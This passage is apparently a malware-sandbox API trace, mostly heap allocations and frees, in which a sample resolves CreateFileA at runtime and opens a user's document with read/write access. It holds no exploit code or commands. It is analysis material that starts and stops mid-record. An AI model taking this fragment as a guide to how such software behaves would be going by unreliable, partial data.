(HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0180.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0180.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0180.249] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0180.249] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0180.249] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0180.249] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0180.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0180.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0180.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0180.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0180.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0180.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0180.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0180.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0180.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0180.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0180.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0180.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0180.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0180.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0180.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0180.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0180.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0180.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0180.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0180.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0180.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0180.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0180.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0180.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0180.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0180.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0180.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0180.251] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0180.251] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0180.251] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0180.251] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0180.251] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9ba1c8 [0180.251] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9ba1c8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0180.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0180.252] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0180.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0180.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0180.252] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0180.252] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0180.252] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0180.252] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0180.252] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0180.252] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba1c8 [0180.252] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9ba1c8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0180.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0180.252] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0180.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0180.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0180.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0180.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0180.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0180.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0180.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0180.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0180.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0180.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0180.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0180.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0180.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0180.253] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zw2wea8 QxA.csv", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0180.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0180.253] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zw2wea8 QxA.csv", cchWideChar=56, lpMultiByteStr=0x90ad98, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zw2wea8 QxA.csv", lpUsedDefaultChar=0x0) returned 56 [0180.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0180.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0180.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0180.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0180.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0180.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0180.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0180.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0180.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0180.254] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zw2wea8 QxA.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zw2wea8 qxa.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0180.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0180.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0180.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0180.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0180.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0180.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0180.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0180.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0180.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0180.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0180.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0180.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0180.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0180.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0180.257] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=56, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0180.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0180.257] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=56, lpWideCharStr=0x906f38, cchWideChar=56 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zw2wea8 QxA.csv") returned 56 [0180.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0180.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fecd8 [0180.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0180.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0180.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0180.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0180.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0180.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0180.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0180.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0180.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0180.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0180.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0180.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0180.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0180.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0180.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0180.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0180.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0180.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0180.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0180.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0180.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0180.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0180.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0180.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0180.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0180.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0180.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0180.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0180.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0180.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0180.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0180.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0180.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0180.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0180.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0180.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0180.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0180.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0180.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0180.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0180.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0180.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0180.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0180.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0180.260] FreeLibrary (hLibModule=0x75990000) returned 1 [0180.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0180.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0180.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0180.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0180.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0180.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0180.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0180.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0180.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0180.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0180.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0180.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0180.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0180.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0180.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0180.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0180.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0180.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0180.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0180.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0180.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0180.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0180.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0180.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0180.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0180.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0180.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0180.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0180.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0180.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0180.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0180.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0180.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0180.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0180.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0180.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0180.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0180.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0180.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0180.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0180.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0180.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0180.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0180.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0180.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0180.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0180.262] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0180.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0180.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0180.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0180.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0180.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0180.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0180.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0180.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0180.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0180.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0180.262] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0180.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0180.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0180.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0180.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0180.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0180.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0180.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0180.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0180.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0180.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0180.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0180.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0180.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0180.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0180.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0180.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0180.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0180.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0180.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0180.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 